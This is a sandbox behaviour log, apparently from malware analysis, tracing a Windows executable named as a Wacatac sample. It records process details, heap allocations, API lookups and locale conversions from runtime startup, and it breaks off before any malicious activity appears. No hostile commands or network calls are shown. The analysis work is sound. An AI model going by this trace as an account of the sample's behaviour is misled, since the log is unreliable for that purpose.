# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 21.11.2019 07:55:10.167 Process: id = "1" image_name = "wacatac_2019-11-20_19-54.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wacatac_2019-11-20_19-54.exe" page_root = "0x4f3c5000" os_pid = "0x980" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x984 [0025.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xd7a1a50, dwHighDateTime=0x1d5a041)) [0025.558] GetCurrentThreadId () returned 0x984 [0025.558] GetCurrentProcessId () returned 0x980 [0025.558] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=14578825391) returned 1 [0025.559] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0025.559] GetProcessHeap () returned 0x4f10000 [0025.560] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0025.560] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0025.561] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0025.562] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0025.563] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x3bc) returned 0x4f23e88 [0025.563] GetCurrentThreadId () returned 0x984 [0025.563] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x18) returned 0x4f20da0 [0025.563] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x800) returned 0x4f24250 [0025.563] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4091ed, hStdOutput=0x68588205, hStdError=0x0)) [0025.563] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0025.563] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0025.563] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0025.564] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe\" " [0025.564] GetEnvironmentStringsW () returned 0x4f24a58* [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0xaca) returned 0x4f25530 [0025.564] FreeEnvironmentStringsW (penv=0x4f24a58) returned 1 [0025.564] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x42a5c8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wacatac_2019-11-20_19-54.exe")) returned 0x42 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8e) returned 0x4f20dc0 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x98) returned 0x4f24a58 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x3e) returned 0x4f24af8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x6c) returned 0x4f24b40 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x6e) returned 0x4f24bb8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x78) returned 0x4f21008 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x62) returned 0x4f24c30 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x2e) returned 0x4f24ca0 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x48) returned 0x4f24cd8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x28) returned 0x4f24d28 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1a) returned 0x4f23920 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4a) returned 0x4f24d58 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x72) returned 0x4f21088 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x30) returned 0x4f24db0 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x2e) returned 0x4f24de8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1c) returned 0x4f23948 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xd2) returned 0x4f24e20 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x7c) returned 0x4f24f00 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x36) returned 0x4f24f88 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x3a) returned 0x4f24fc8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x90) returned 0x4f25010 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x24) returned 0x4f250a8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x30) returned 0x4f250d8 [0025.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x36) returned 0x4f25110 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x48) returned 0x4f25150 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x52) returned 0x4f251a0 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x3c) returned 0x4f25200 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x82) returned 0x4f25248 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x2e) returned 0x4f252d8 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1e) returned 0x4f23970 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x2c) returned 0x4f25310 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x54) returned 0x4f25348 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x52) returned 0x4f253a8 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x2a) returned 0x4f25408 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x3c) returned 0x4f25440 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x54) returned 0x4f25488 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x24) returned 0x4f254e8 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x30) returned 0x4f26008 [0025.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x8c) returned 0x4f26040 [0025.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f25530 | out: hHeap=0x4f10000) returned 1 [0025.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x80) returned 0x4f25518 [0025.566] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0025.566] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0025.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x800) returned 0x4f255a0 [0025.566] GetLastError () returned 0x0 [0025.566] SetLastError (dwErrCode=0x0) [0025.566] GetLastError () returned 0x0 [0025.566] SetLastError (dwErrCode=0x0) [0025.566] GetLastError () returned 0x0 [0025.566] SetLastError (dwErrCode=0x0) [0025.566] GetACP () returned 0x4e4 [0025.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x4f25da8 [0025.566] GetLastError () returned 0x0 [0025.566] SetLastError (dwErrCode=0x0) [0025.566] IsValidCodePage (CodePage=0x4e4) returned 1 [0025.566] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0025.566] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0025.567] GetLastError () returned 0x0 [0025.567] SetLastError (dwErrCode=0x0) [0025.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.567] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0025.567] GetLastError () returned 0x0 [0025.567] SetLastError (dwErrCode=0x0) [0025.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0025.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0025.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95\x83Xhäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0025.567] GetLastError () returned 0x0 [0025.567] SetLastError (dwErrCode=0x0) [0025.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0025.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0025.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 